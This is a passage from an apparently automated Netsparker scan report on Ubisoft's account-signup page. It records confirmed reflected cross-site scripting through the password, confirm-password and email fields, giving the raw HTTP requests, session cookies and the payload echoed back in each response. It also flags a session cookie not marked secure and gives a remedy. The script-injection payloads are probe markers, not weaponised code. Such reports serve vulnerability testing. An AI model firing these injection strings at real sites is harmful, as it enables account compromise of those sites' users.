<td><input id="password" name="password" type="password" maxlength="16" value="'"--></style></script><script>netsparker(0x0005E0)</script>" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your Password','Please be original in choosing a password. For security reasons, please do not use anything that might easily connect your password to you.<br/><br/> Passwords must be at least 6 characters long and a maximum of 16 characters long. <br/> Passwords are case sensitive. <br/> The username cannot appear in the password.<br/> Passwords must contain at least one letter.');glossaryToolTip('Choosing Your Password', 366);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Confirm Password</td>
</tr>
<tr>
<td/>
<td><input id="confirmpassword" name="confirmpassword" type="password" maxlength="16" value="3" class="inputcreateusererror"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldname">*&nbsp;Email</td>
</tr>
<tr>
<td/>
<td><input id="email" name="email" type="text" maxlength="150" value="netsparker@example.com" class="inputcreateuser">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Please make sure to enter a correct email address as it is the only way for us to reach you.','');glossaryToolTip('Please make sure to enter a correct email address as it is the only way for us to reach you.', 0);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Date of Birth</td>
</tr>
<tr>
<td/>
<td><select id="birthdate_m" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="m1">Jan</option><option value="m2">Feb</option><option value="m3">Mar</option><option value="m4">Apr</option><option value="m5">May</option><option value="m6">Jun</option><option value="m7">Jul</option><option value="m8">Aug</option><option value="m9">Sep</option><option value="m10">Oct</option><option value="m11">Nov</option><option value="m12">Dec</option></select><select id="birthdate_d" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="d1">1</option><option value="d2">2</option><option value="d3">3</option><option value="d4">4</option><option value="d5">5</option><option value="d6">6</option><option value="d7">7</option><option value="d8">8</option><option value="d9">9</option><option value="d10">10</option><option value="d11">11</option><option value="d12">12</option><option value="d13">13</option><option value="d14">14</option><option value="d15">15</option><option value="d16">16</option><option value="d17">17</option><option value="d18">18</option><option value="d19">19</option><option value="d20">20</option><option value="d21">21</option><option value="d22">22</option><option value="d23">23</option><option value="d24">24</option><option value="d25">25</option><option value="d26">26</option><option value="d27">27</option><option value="d28">28</option><option value="d29">29</option><option value="d30">30</option><option value="d31">31</option></select><select id="birthdate_y" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="y2011">2011</option><option value="y2010">2010</option><option value="y2009">2009</option><option value="y2008">2008</option><option value="y2007">2007</option><option value="y2006">2006</option><option value="y2005">2005</option><option value="y2004">2004</option><option value="y2003">2003</option><option value="y2002">2002</option><option value="y2001">2001</option><option value="y2000">2000</option><option value="y1999">1999</option><option value="y1998">1998</option><option value="y1997">1997</option><option value="y1996">1996</option><option value="y1995">1995</option><option value="y1994">1994</option><option value="y1993">1993</option><option value="y1992">1992</option><option value="y1991">1991</option><option value="y1990">1990</option><option value="y1989">1989</option><option value="y1988">1988</option><option value="y1987">1987</option><option value="y1986">1986</option><option value="y1985">1985</option><option value="y1984">1984</option><option value="y1983">1983</option><option value="y1982">1982</option><option value="y1981">1981</option><option value="y1980">1980</option><option value="y1979">1979</option><option value="y1978">1978</option><option value="y1977">1977</option><option value="y1976">1976</option><option value="y1975">1975</option><option value="y1974">1974</option><option value="y1973">1973</option><option value="y1972">1972</option><option value="y1971">1971</option><option value="y1970">1970</option><option value="y1969">1969</option><option value="y1968">1968</option><option value="y1967">1967</option><option value="y1966">1966</option><option value="y1965">1965</option><option value="y1964">1964</option><option value="y1963">1963</option><option value="y1962">1962</option><option value="y1961">1961</option><option value="y1960">1960</option><option value="y1959">1959</option><option value="y1958">1958</option><option value="y1957">1957</option><option value="y1956">1956</option><option value="y1955">1955</option><option value="y1954">1954</option><option value="y1953">1953</option><option value="y1952">1952</option><option value="y1951">1951</option><option value="y1950">1950</option><option value="y1949">1949</option><option value=&q..
- /login/UserInteraction.aspx

/login/UserInteraction.aspx CONFIRMED

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW Om/nytQxM0XnQ==
login POST 3
password POST 3
confirmpassword POST '"--></style></script><script>alert(0x0005E2)</script>
email POST netsparker@example.com
birthdate POST m10
country POST ag
_buttonClicked POST submit
m_ImageButtonSubmit.x POST 0
m_ImageButtonSubmit.y POST 0

Request

POST /login/UserInteraction.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/UserInteraction.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=wd52t445wlp1eo45uu2igi45; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 315
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW%2bOm%2fnytQxM0XnQ%3d%3d&login=3&password=3&confirmpassword='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0005E2)%3c%2fscript%3e&email=netsparker%40example.com&birthdate=m10&country=ag&_buttonClicked=submit&m_ImageButtonSubmit.x=0&m_ImageButtonSubmit.y=0

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:30:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39772


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Create Your Account</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="UserInteraction.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW+Om/nytQxM0XnQ==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2"><img src="/login/Skins/default/en-US/tl_signup.gif" border="0" /></td>
</tr>
<tr>
<td colspan="2" height="20"/>
</tr>
<tr>
<td/>
<td class="mainmessage">Please provide the following information to create your ubi.com account.</td>
</tr>

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">



<tr>
<td/>
<td class="fieldnameerror">*&nbsp;User Name</td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="15" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your User Name','Please choose a ubi.com user name that is in good taste and will be easy for you to remember. It must be a unique name, not already in use by other users.<br/><br/> Please note that your user name must meet the following criteria:<br/>· User names must be unique<br/>· User names must start with a letter.<br/>· User names may contain letters, digits, underscores (_), dots (.) and dashes (-).<br/>· The length must be between 3 and 15 characters.<br/>· Words considered vulgar or offensive are not allowed as any part of the user name.<br/>· It cannot start or end with letter combinations reserved by the company (i.e. ubi_ or _ubi).');glossaryToolTip('Choosing Your User Name', 636);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Password</td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your Password','Please be original in choosing a password. For security reasons, please do not use anything that might easily connect your password to you.<br/><br/> Passwords must be at least 6 characters long and a maximum of 16 characters long. <br/> Passwords are case sensitive. <br/> The username cannot appear in the password.<br/> Passwords must contain at least one letter.');glossaryToolTip('Choosing Your Password', 366);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Confirm Password</td>
</tr>
<tr>
<td/>
<td><input id="confirmpassword" name="confirmpassword" type="password" maxlength="16" value="'"--></style></script><script>netsparker(0x0005E2)</script>" class="inputcreateusererror"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldname">*&nbsp;Email</td>
</tr>
<tr>
<td/>
<td><input id="email" name="email" type="text" maxlength="150" value="netsparker@example.com" class="inputcreateuser">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Please make sure to enter a correct email address as it is the only way for us to reach you.','');glossaryToolTip('Please make sure to enter a correct email address as it is the only way for us to reach you.', 0);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Date of Birth</td>
</tr>
<tr>
<td/>
<td><select id="birthdate_m" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="m1">Jan</option><option value="m2">Feb</option><option value="m3">Mar</option><option value="m4">Apr</option><option value="m5">May</option><option value="m6">Jun</option><option value="m7">Jul</option><option value="m8">Aug</option><option value="m9">Sep</option><option value="m10">Oct</option><option value="m11">Nov</option><option value="m12">Dec</option></select><select id="birthdate_d" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="d1">1</option><option value="d2">2</option><option value="d3">3</option><option value="d4">4</option><option value="d5">5</option><option value="d6">6</option><option value="d7">7</option><option value="d8">8</option><option value="d9">9</option><option value="d10">10</option><option value="d11">11</option><option value="d12">12</option><option value="d13">13</option><option value="d14">14</option><option value="d15">15</option><option value="d16">16</option><option value="d17">17</option><option value="d18">18</option><option value="d19">19</option><option value="d20">20</option><option value="d21">21</option><option value="d22">22</option><option value="d23">23</option><option value="d24">24</option><option value="d25">25</option><option value="d26">26</option><option value="d27">27</option><option value="d28">28</option><option value="d29">29</option><option value="d30">30</option><option value="d31">31</option></select><select id="birthdate_y" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="y2011">2011</option><option value="y2010">2010</option><option value="y2009">2009</option><option value="y2008">2008</option><option value="y2007">2007</option><option value="y2006">2006</option><option value="y2005">2005</option><option value="y2004">2004</option><option value="y2003">2003</option><option value="y2002">2002</option><option value="y2001">2001</option><option value="y2000">2000</option><option value="y1999">1999</option><option value="y1998">1998</option><option value="y1997">1997</option><option value="y1996">1996</option><option value="y1995">1995</option><option value="y1994">1994</option><option value="y1993">1993</option><option value="y1992">1992</option><option value="y1991">1991</option><option value="y1990">1990</option><option value="y1989">1989</option><option value="y1988">1988</option><option value="y1987">1987</option><option value="y1986">1986</option><option value="y1985">1985</option><option value="y1984">1984</option><option value="y1983">1983</option><option value="y1982">1982</option><option value="y1981">1981</option><option value="y1980">1980</option><option value="y1979">1979</option><option value="y1978">1978</option><option value="y1977">1977</option><option value="y1976">1976</option><option value="y1975">1975</option><option value="y1974">1974</option><option value="y1973">1973</option><option value="y1972">1972</option><option value="y1971">1971</option><option value="y1970">1970</option><option value="y1969">1969</option><option value="y1968">1968</option><option value="y1967">1967</option><option value="y1966">1966</option><option value="y1965">1965</option><option value="y1964">1964</option><option value="y1963">1963</option><option value="y1962">1962</option><option value="y1961">1961</option><option value="y1960">1960</option><option value="y1959">1959</option><option value="y1958">1958</option><option value="y1957">1957</option><option value="y1956">1956</option><option value="y1955">1955</option><option value="y1954">1954</option><option value="y1953">1953</option><option value="y1952">1952</option><option value="y1951">1951</option><option value="y1950">1950</option><option value="y1949">1949</option><option value=&q..
- /login/UserInteraction.aspx

/login/UserInteraction.aspx CONFIRMED

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW Om/nytQxM0XnQ==
login POST 3
password POST 3
confirmpassword POST 3
email POST '"--></style></script><script>alert(0x0005E6)</script>
birthdate POST m10
country POST ag
_buttonClicked POST submit
m_ImageButtonSubmit.x POST 0
m_ImageButtonSubmit.y POST 0

Request

POST /login/UserInteraction.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/UserInteraction.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=wd52t445wlp1eo45uu2igi45; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 292
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW%2bOm%2fnytQxM0XnQ%3d%3d&login=3&password=3&confirmpassword=3&email='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0005E6)%3c%2fscript%3e&birthdate=m10&country=ag&_buttonClicked=submit&m_ImageButtonSubmit.x=0&m_ImageButtonSubmit.y=0

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:30:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39960


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Create Your Account</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="UserInteraction.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW+Om/nytQxM0XnQ==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2"><img src="/login/Skins/default/en-US/tl_signup.gif" border="0" /></td>
</tr>
<tr>
<td colspan="2" height="20"/>
</tr>
<tr>
<td/>
<td class="mainmessage">Please provide the following information to create your ubi.com account.</td>
</tr>

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">



<tr>
<td/>
<td class="fieldnameerror">*&nbsp;User Name</td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="15" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your User Name','Please choose a ubi.com user name that is in good taste and will be easy for you to remember. It must be a unique name, not already in use by other users.<br/><br/> Please note that your user name must meet the following criteria:<br/>· User names must be unique<br/>· User names must start with a letter.<br/>· User names may contain letters, digits, underscores (_), dots (.) and dashes (-).<br/>· The length must be between 3 and 15 characters.<br/>· Words considered vulgar or offensive are not allowed as any part of the user name.<br/>· It cannot start or end with letter combinations reserved by the company (i.e. ubi_ or _ubi).');glossaryToolTip('Choosing Your User Name', 636);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Password</td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your Password','Please be original in choosing a password. For security reasons, please do not use anything that might easily connect your password to you.<br/><br/> Passwords must be at least 6 characters long and a maximum of 16 characters long. <br/> Passwords are case sensitive. <br/> The username cannot appear in the password.<br/> Passwords must contain at least one letter.');glossaryToolTip('Choosing Your Password', 366);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Confirm Password</td>
</tr>
<tr>
<td/>
<td><input id="confirmpassword" name="confirmpassword" type="password" maxlength="16" value="3" class="inputcreateusererror"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Email</td>
</tr>
<tr>
<td/>
<td><input id="email" name="email" type="text" maxlength="150" value="'"--></style></script><script>netsparker(0x0005E6)</script>" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Please make sure to enter a correct email address as it is the only way for us to reach you.','');glossaryToolTip('Please make sure to enter a correct email address as it is the only way for us to reach you.', 0);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Date of Birth</td>
</tr>
<tr>
<td/>
<td><select id="birthdate_m" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="m1">Jan</option><option value="m2">Feb</option><option value="m3">Mar</option><option value="m4">Apr</option><option value="m5">May</option><option value="m6">Jun</option><option value="m7">Jul</option><option value="m8">Aug</option><option value="m9">Sep</option><option value="m10">Oct</option><option value="m11">Nov</option><option value="m12">Dec</option></select><select id="birthdate_d" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="d1">1</option><option value="d2">2</option><option value="d3">3</option><option value="d4">4</option><option value="d5">5</option><option value="d6">6</option><option value="d7">7</option><option value="d8">8</option><option value="d9">9</option><option value="d10">10</option><option value="d11">11</option><option value="d12">12</option><option value="d13">13</option><option value="d14">14</option><option value="d15">15</option><option value="d16">16</option><option value="d17">17</option><option value="d18">18</option><option value="d19">19</option><option value="d20">20</option><option value="d21">21</option><option value="d22">22</option><option value="d23">23</option><option value="d24">24</option><option value="d25">25</option><option value="d26">26</option><option value="d27">27</option><option value="d28">28</option><option value="d29">29</option><option value="d30">30</option><option value="d31">31</option></select><select id="birthdate_y" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="y2011">2011</option><option value="y2010">2010</option><option value="y2009">2009</option><option value="y2008">2008</option><option value="y2007">2007</option><option value="y2006">2006</option><option value="y2005">2005</option><option value="y2004">2004</option><option value="y2003">2003</option><option value="y2002">2002</option><option value="y2001">2001</option><option value="y2000">2000</option><option value="y1999">1999</option><option value="y1998">1998</option><option value="y1997">1997</option><option value="y1996">1996</option><option value="y1995">1995</option><option value="y1994">1994</option><option value="y1993">1993</option><option value="y1992">1992</option><option value="y1991">1991</option><option value="y1990">1990</option><option value="y1989">1989</option><option value="y1988">1988</option><option value="y1987">1987</option><option value="y1986">1986</option><option value="y1985">1985</option><option value="y1984">1984</option><option value="y1983">1983</option><option value="y1982">1982</option><option value="y1981">1981</option><option value="y1980">1980</option><option value="y1979">1979</option><option value="y1978">1978</option><option value="y1977">1977</option><option value="y1976">1976</option><option value="y1975">1975</option><option value="y1974">1974</option><option value="y1973">1973</option><option value="y1972">1972</option><option value="y1971">1971</option><option value="y1970">1970</option><option value="y1969">1969</option><option value="y1968">1968</option><option value="y1967">1967</option><option value="y1966">1966</option><option value="y1965">1965</option><option value="y1964">1964</option><option value="y1963">1963</option><option value="y1962">1962</option><option value="y1961">1961</option><option value="y1960">1960</option><option value="y1959">1959</option><option value="y1958">1958</option><option value="y1957">1957</option><option value="y1956">1956</option><option value="y1955">1955</option><option value=&..
Cookie Not Marked As Secure

Cookie Not Marked As Secure

1 TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.
- /login/

/login/ CONFIRMED

Identified Cookie

ASP.NET_SessionId

Request

GET /login/ HTTP/1.1
Referer: https://secure.ubi.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.ubi.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Found
Date: Fri, 22 Apr 2011 16:27:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /login/Login.aspx
Set-Cookie: ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 134


<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/login/Login.aspx'>here</a>.</h2>
</body></html>
